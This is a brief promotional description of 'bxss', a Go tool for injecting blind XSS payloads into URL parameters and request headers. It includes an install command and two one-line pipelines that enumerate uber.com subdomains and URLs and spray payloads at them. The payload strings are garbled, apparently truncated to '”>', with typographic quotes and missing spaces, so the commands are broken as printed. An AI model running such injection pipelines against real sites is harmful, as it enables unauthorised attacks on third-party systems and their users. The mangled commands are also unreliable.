Bxss is a script written in go that lets us discover Blind XSS Injector security gaps.
Specifications
Insert Blind XSS payloads into custom headers
Enter Blind XSS payloads in parameters
Uses different request methods (PUT, POST, GET, OPTIONS) simultaneously
It has a large chain tools
Really very fast
Easy to installation
Installation
$ go get -u github.com/ethicalhackingplayground/bxss
Use
Blind XSS In Parameters
$ subfinder uber.com | gau | grep “&” | bxss -appendMode -payload '”>'-parameters
Blind XSS In X-Forwarded-For Header
$ subfinder uber.com | gau | bxss -payload '”>'-header “X-Forwarded-For”
Application snapshots
You can download it program from here.